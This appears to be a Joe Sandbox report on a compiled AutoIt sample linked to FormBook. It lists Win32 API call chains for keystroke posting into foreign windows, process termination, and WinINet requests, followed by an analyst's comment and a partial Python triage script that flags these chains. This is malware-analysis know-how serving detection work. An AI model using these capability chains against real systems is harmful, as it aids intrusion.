                                        • Opcode ID: dd39b9b9e28fdf17d371c14237bec5fdf20fb41baea0dadc735a07fffb1da557
                                        • Instruction ID: a9d2bc2e3ffe2790b3cfc6df5c4fbb3addca0c2ea598c5d7a3fb906c5d684ede
                                        • Opcode Fuzzy Hash: dd39b9b9e28fdf17d371c14237bec5fdf20fb41baea0dadc735a07fffb1da557
                                        • Instruction Fuzzy Hash: D261B170608305AFD320EF54C849BAEB7E4EF48760F104909FA8597691CB74EE49DB96
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000E33CF
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000E33F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-3080491070
                                        • Opcode ID: 996c11eaad80b3c468644184c527031ac3afc0ad9e1406a27716e22c81fbbb30
                                        • Instruction ID: 82c3f54f7e777d2d88703d8ab93d01de200a616eb97f159c301840522e2e9375
                                        • Opcode Fuzzy Hash: 996c11eaad80b3c468644184c527031ac3afc0ad9e1406a27716e22c81fbbb30
                                        • Instruction Fuzzy Hash: D5518D72D00609BADF15EBA0CD46EEEB7B8AF14340F108165F509731A2EB352F98DB65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 1256254125-769500911
                                        • Opcode ID: 47602f5617b5b1ad23a9103170b2b2f2e4a0a5a86b746b803424c72a2d5441ae
                                        • Instruction ID: 13a00ab7aa8bb70fb4962130521ab9649155355e5e4c2607f3f48e4425568ede
                                        • Opcode Fuzzy Hash: 47602f5617b5b1ad23a9103170b2b2f2e4a0a5a86b746b803424c72a2d5441ae
                                        • Instruction Fuzzy Hash: 8941E832A00226DBCB605F7D89905BE77E5AF61754B26412BE421D7384E739CD81C7A0
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E53A0
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000E5416
                                        • GetLastError.KERNEL32 ref: 000E5420
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 000E54A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 07219b3399a57766b2ff998c3b25ef021183bf8797cf8e7f544055ddad0593f5
                                        • Instruction ID: 94263ec076185c106757acf6f84be2c492ebe59c95c56234172f6c5b9f6898d8
                                        • Opcode Fuzzy Hash: 07219b3399a57766b2ff998c3b25ef021183bf8797cf8e7f544055ddad0593f5
                                        • Instruction Fuzzy Hash: AD31D0B5A006449FC750DF69C884AAABBF4EF4530EF14C465E405EB2A2DBB0DD86CB90
                                        APIs
                                        • CreateMenu.USER32 ref: 00103C79
                                        • SetMenu.USER32(?,00000000), ref: 00103C88
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00103D10
                                        • IsMenu.USER32(?), ref: 00103D24
                                        • CreatePopupMenu.USER32 ref: 00103D2E
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00103D5B
                                        • DrawMenuBar.USER32 ref: 00103D63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0$F
                                        • API String ID: 161812096-3044882817
                                        • Opcode ID: a52f89b95ecb3b68aab9972d2817dfc598f1d3fdf31b90e77e580e2c961439e7
                                        • Instruction ID: 0f7097e3b1f26bee1f12ab438ab030d888764a2d853bc217d976634328936071
                                        • Opcode Fuzzy Hash: a52f89b95ecb3b68aab9972d2817dfc598f1d3fdf31b90e77e580e2c961439e7
                                        • Instruction Fuzzy Hash: 22419C79A01209EFDB14CFA4D844AEA7BB9FF49310F140129F996973A0D7B0AA50DF90
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00103A9D
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00103AA0
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00103AC7
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00103AEA
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00103B62
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00103BAC
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00103BC7
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00103BE2
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00103BF6
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00103C13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 000DB151
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB165
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 000DB16C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB17B
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000DB18D
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB1A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB1B8
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB1FD
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB212
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000DA1E1,?,00000001), ref: 000DB21D
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        APIs
                                        • _free.LIBCMT ref: 000A2C94
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000A2CA0
                                        • _free.LIBCMT ref: 000A2CAB
                                        • _free.LIBCMT ref: 000A2CB6
                                        • _free.LIBCMT ref: 000A2CC1
                                        • _free.LIBCMT ref: 000A2CCC
                                        • _free.LIBCMT ref: 000A2CD7
                                        • _free.LIBCMT ref: 000A2CE2
                                        • _free.LIBCMT ref: 000A2CED
                                        • _free.LIBCMT ref: 000A2CFB
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00071459
                                        • OleUninitialize.OLE32(?,00000000), ref: 000714F8
                                        • UnregisterHotKey.USER32(?), ref: 000716DD
                                        • DestroyWindow.USER32(?), ref: 000B24B9
                                        • FreeLibrary.KERNEL32(?), ref: 000B251E
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000B254B
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E7FAD
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E7FC1
                                        • GetFileAttributesW.KERNEL32(?), ref: 000E7FEB
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 000E8005
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8017
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8060
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000E80B0
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile
                                        • String ID: *.*
                                        • API String ID: 769691225-438819550
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00075C7A
                                          • Part of subcall function 00075D0A: GetClientRect.USER32(?,?), ref: 00075D30
                                          • Part of subcall function 00075D0A: GetWindowRect.USER32(?,?), ref: 00075D71
                                          • Part of subcall function 00075D0A: ScreenToClient.USER32(?,?), ref: 00075D99
                                        • GetDC.USER32 ref: 000B46F5
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000B4708
                                        • SelectObject.GDI32(00000000,00000000), ref: 000B4716
                                        • SelectObject.GDI32(00000000,00000000), ref: 000B472B
                                        • ReleaseDC.USER32(?,00000000), ref: 000B4733
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000B47C4
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000E35E4
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • LoadStringW.USER32(00142390,?,00000FFF,?), ref: 000E360A
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-2391861430
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000EC272
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000EC29A
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000EC2CA
                                        • GetLastError.KERNEL32 ref: 000EC322
                                        • SetEvent.KERNEL32(?), ref: 000EC336
                                        • InternetCloseHandle.WININET(00000000), ref: 000EC341
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000B3AAF,?,?,Bad directive syntax error,0010CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000D98BC
                                        • LoadStringW.USER32(00000000,?,000B3AAF,?), ref: 000D98C3
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000D9987
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        APIs
                                        • GetParent.USER32 ref: 000D20AB
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 000D20C0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000D214D
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        APIs
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        APIs
                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00105186
                                        • ShowWindow.USER32(?,00000000), ref: 001051C7
                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 001051CD
                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001051D1
                                          • Part of subcall function 00106FBA: DeleteObject.GDI32(00000000), ref: 00106FE6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0010520D
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0010521A
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0010524D
                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00105287
                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00105296
                                        Similarity
                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                        • String ID:
                                        • API String ID: 3210457359-0
                                        APIs
                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000C6890
                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000C68A9
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000C68B9
                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000C68D1
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000C68F2
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00088874,00000000,00000000,00000000,000000FF,00000000), ref: 000C6901
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000C691E
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00088874,00000000,00000000,00000000,000000FF,00000000), ref: 000C692D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 1268354404-0
                                        • Opcode ID: b3065161a495588e37348870380f5998448f75e57594c6f13cc9c27af13ee02e
                                        • Instruction ID: f0af79eaf27b8577fd5e344bb94978c7ce7858158291fb88d635f28c535f4a66
                                        • Opcode Fuzzy Hash: b3065161a495588e37348870380f5998448f75e57594c6f13cc9c27af13ee02e
                                        • Instruction Fuzzy Hash: 5D516974600209AFDB20EF24CC95FAE7BF5FB98750F108618F996972A0DB71E990DB50
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000EC182
                                        • GetLastError.KERNEL32 ref: 000EC195
                                        • SetEvent.KERNEL32(?), ref: 000EC1A9
                                          • Part of subcall function 000EC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000EC272
                                          • Part of subcall function 000EC253: GetLastError.KERNEL32 ref: 000EC322
                                          • Part of subcall function 000EC253: SetEvent.KERNEL32(?), ref: 000EC336
                                          • Part of subcall function 000EC253: InternetCloseHandle.WININET(00000000), ref: 000EC341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: 3986f18be59d0d40970369d527059409545faa788fd9a13c7d702e8a472618a0
                                        • Instruction ID: f32c9e564e69e9b135bf6be7e159e0560243f65eb3f00e07fb1ff3670d819a4f
                                        • Opcode Fuzzy Hash: 3986f18be59d0d40970369d527059409545faa788fd9a13c7d702e8a472618a0
                                        • Instruction Fuzzy Hash: 2D31A371100681AFEB219FA6DC04E6A7BF8FF14300B00451DFA5696A11D732E8519FA0
                                        APIs
                                          • Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
                                          • Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
                                          • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000D25BD
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000D25DB
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000D25DF
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000D25E9
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000D2601
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 000D2605
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000D260F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000D2623
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 000D2627
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: b6ca665d7f67a789c84d5667db1b732ddd20de04673ffa51d1a693ae146f5940
                                        • Instruction ID: c2ee7283797ad0c16b1cfc35b38a292b0cc6c7c6210db7249f97909900181c22
                                        • Opcode Fuzzy Hash: b6ca665d7f67a789c84d5667db1b732ddd20de04673ffa51d1a693ae146f5940
                                        • Instruction Fuzzy Hash: 6501B530390710BBFB2067689C8AF993E59EB5AB11F100102F354AE1D1C9F254848EBA
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,000D1449,?,?,00000000), ref: 000D180C
                                        • HeapAlloc.KERNEL32(00000000,?,000D1449,?,?,00000000), ref: 000D1813
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000D1449,?,?,00000000), ref: 000D1828
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,000D1449,?,?,00000000), ref: 000D1830
                                        • DuplicateHandle.KERNEL32(00000000,?,000D1449,?,?,00000000), ref: 000D1833
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000D1449,?,?,00000000), ref: 000D1843
                                        • GetCurrentProcess.KERNEL32(000D1449,00000000,?,000D1449,?,?,00000000), ref: 000D184B
                                        • DuplicateHandle.KERNEL32(00000000,?,000D1449,?,?,00000000), ref: 000D184E
                                        • CreateThread.KERNEL32(00000000,00000000,000D1874,00000000,00000000,00000000), ref: 000D1868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: ecfe381d0a46f7ef665834a48300c5698df0dbae5ae3de43e6d3ce65e6c851b3
                                        • Instruction ID: 68e522301030ae284cd692fff8d4b785ae6836844ad3d3d8a636c7b2793b10d5
                                        • Opcode Fuzzy Hash: ecfe381d0a46f7ef665834a48300c5698df0dbae5ae3de43e6d3ce65e6c851b3
                                        • Instruction Fuzzy Hash: 1101AC75240304FFE610AB65DC49F573B6CEB89B11F004511FA45DB591CAB09840CF60
                                        APIs
                                          • Part of subcall function 000DD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 000DD501
                                          • Part of subcall function 000DD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
                                          • Part of subcall function 000DD4DC: CloseHandle.KERNEL32(00000000), ref: 000DD5DC
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA16D
                                        • GetLastError.KERNEL32 ref: 000FA180
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA1B3
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 000FA268
                                        • GetLastError.KERNEL32(00000000), ref: 000FA273
                                        • CloseHandle.KERNEL32(00000000), ref: 000FA2C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: b0d382b07a5fd16d7ee2401614a7403804cedcfc37deedc63f22634068d05992
                                        • Instruction ID: 74e7bf097e503c4d9b2a7e870098e22e5f3795244cf9094dd58f7d7de7d13895
                                        • Opcode Fuzzy Hash: b0d382b07a5fd16d7ee2401614a7403804cedcfc37deedc63f22634068d05992
                                        • Instruction Fuzzy Hash: D0618A702042029FD360DF18C494F69BBE1AF45318F14849CE56A4BBA3C776ED45CB92
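The two entries above that matter most for triage are the keystroke chain (AttachThreadInput, then MapVirtualKeyW and PostMessageW with WM_KEYDOWN 0x100 / WM_KEYUP 0x101 carrying VK_LEFT 0x25 and VK_RIGHT 0x27 into a foreign window) and the process-termination chain (CreateToolhelp32Snapshot/Process32FirstW, OpenProcess with access mask 0x00000001 = PROCESS_TERMINATE, TerminateProcess, tagged with the string SeDebugPrivilege). Both are consistent with builtins of the AutoIt runtime the report identified ("Binary is likely a compiled AutoIt script file"), ControlSend and ProcessClose respectively, so they show what the interpreter can do rather than what this particular script does; the unpacked FormBook payload is injected elsewhere. The Python below is an added example, not Joe Sandbox or AutoIt code. It parses the report's call-line format (bullet, optional "Part of subcall function", Api.MODULE(args), ref) and flags those chains plus WinINet URL fetches. The two sample entries embedded in it are copied from this report; the Call dataclass, the rule functions and triage() are this example's own names. One caveat it encodes: the argument lists in these reports are stack snapshots (DestroyIcon is shown with sixteen values although it takes one), so only the leading values are read as real parameters.

```python
"""Triage helper for the per-function 'APIs' lists in a Joe Sandbox report.

Added example, not Joe Sandbox code. Parses lines such as
    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA16D
    • GetLastError.KERNEL32 ref: 000FA180
and flags API chains worth a closer look before trusting the function-level view.
"""
import re
from dataclasses import dataclass

# Win32 constants as defined in the SDK headers.
PROCESS_TERMINATE = 0x0001
WM_KEYDOWN = 0x0100
WM_KEYUP = 0x0101

# One call line: optional bullet, optional "Part of subcall function XXXX:",
# then Api.MODULE, an optional "(args)" and the "ref: XXXX" call-site address.
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Call:
    api: str
    module: str
    args: list      # int for hex values, None for '?' (value not recovered)
    ref: str        # address of the call site
    caller: str     # subcall function the report attributes the call to, or ""


def _parse_arg(token):
    token = token.strip()
    if token in ("", "?"):
        return None
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_calls(text):
    """Parse every call line of one report entry; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
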